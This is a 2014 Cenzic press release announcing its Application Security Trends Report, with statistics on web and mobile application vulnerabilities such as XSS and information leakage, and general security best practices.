Cenzic Releases 2014 Application Security Trends Report

Annual Study Finds That Ninety-Six Percent of Tested Applications Have Security Vulnerabilities

Feb 19, 2014, 09:00 ET from Cenzic

CAMPBELL, Calif., Feb. 19, 2014 /PRNewswire/ -- Cenzic, the leading provider of application security intelligence to reduce security risks, today released a new report which demonstrates that nearly all current applications contain security vulnerabilities that leave them vulnerable to cyber attacks. The newly released Cenzic Application Security Trends Report 2014 registers security flaws in 96 percent of tested applications – which continues to be alarmingly high.

The report, gathered by the Cenzic Managed Security team during its analysis of applications in production, shows that improvements in patch deployment and secure coding practices have made a slight impact on the incidence of vulnerabilities. However, the emergence of BYOD, cloud services and mobile applications – and the continued failure of organizations to detect and address exploits around information leakage, authentication and authorization, and session management are keeping vulnerabilities nearly ubiquitous. In fact, the median number of vulnerabilities per application – 14 – is actually greater than it was in the previous year – 13.

"In the three years that we have compiled this study, the frequency of application vulnerabilities discovered has remained consistently, astoundingly high," said Bala Venkat, Chief Marketing Officer (CMO) at Cenzic. "While some improvements in the development process have been made, other newer areas of vulnerability have emerged. It's a graphic illustration of the gigantic game of whack-a-mole that enterprises and software developers are playing – and a clear message that it's time to rethink the way we develop and test our applications."

The Cenzic Application Security Trends Report 2014 revealed a wide range of findings regarding application vulnerabilities including:

  • Steady growth in the incidence of security flaws in mobile applications. The report found that privacy violation and excessive privileges appear in over 80 percent of mobile applications.
  • Increasing incidences of vulnerabilities found in applications shared with third parties. Cloud services providers and supply chain partners that may be outside the organization's sphere of influence are a major source of threats today.
  • Information leakage is caused by vulnerable applications. Around 23 percent of vulnerabilities were related to information leakage, in which an application inappropriately discloses sensitive data, such as technical details of the application or user-specific data.
  • The age-old problem of Cross-Site Scripting (XSS) is still to blame. Some 25 percent of vulnerabilities were related to cross-site scripting (XSS), in which an application allows attackers to send malicious scripts by relaying the script from an otherwise trusted URL.
  • Mixed vulnerabilities in other areas cannot be ignored. Flaws in authentication or authorization made up 15 percent of vulnerabilities, and session management errors accounted for 13 percent.

"While old standbys such as XSS and SQL injection may be coming under better control, emerging classes of vulnerabilities – such as information leakage, which is common in mobile applications – are growing," added Venkat. "The growth of emerging technologies and new application categories – such as cloud and mobile apps – increases the complexity of the security effort."

Many of today's vulnerabilities – even those that are relatively new – are preventable. Cenzic has outlined some key best practices to remind enterprises of some simple solutions that can help secure their applications:

  • Implement Safe Coding Practices. These are techniques used by application developers to deflect potential security breaches. Consistent, high quality coding practices are the most effective deterrent to attacks.
  • Use Web Application Firewalls (WAFs). WAFs enable policy-based blocking of specific vulnerabilities that exist in applications, without rewriting application code. WAFs are a particularly effective method for rapidly blocking a vulnerability found in a production application, without requiring a full re-release of an application containing vulnerabilities.
  • Ensure Proper Server Configurations. This is the range of practices for managing the server hardware, operating systems and security certifications on the devices that run a particular application.

"One of the chief obstacles that remains is to get software developers and enterprises to stop thinking of vulnerability scanning as a one-time project," Venkat stated. "As web applications evolve and make their journey traversing various production environments, the incidence of vulnerabilities is growing, not shrinking. Applications development and security teams must get together and implement a plan for continuous proactive monitoring of vulnerabilities, rather than the traditional, annual quality assessment."

The Cenzic Application Security Trends Report 2014 is available here.  Cenzic will also be attending RSA 2014 in San Francisco and is available to discuss the findings there.

About Cenzic, Inc.
Cenzic provides the leading application security intelligence platform to continuously assess Cloud, Mobile and Web applications to reduce online security risk. Cenzic's solutions scale from single applications to enterprise-level deployments with hybrid approaches that enable testing of applications at optimal levels. Cenzic helps brands of all sizes protect their reputation and manage security risk in the face of malicious attacks. Cenzic's solutions are used in all parts of the software development lifecycle, and most importantly in production, to protect against new threats even after the application has been deployed. Cenzic's application security intelligence platform is architected to handle web, cloud and mobile applications and is the first to provide risk reduction recommendations for business, application developers and specific applications. Today, Cenzic secures more than half a million online applications and trillions of dollars of commerce for Fortune 1000 companies, all major security companies, government agencies, universities and SMBs.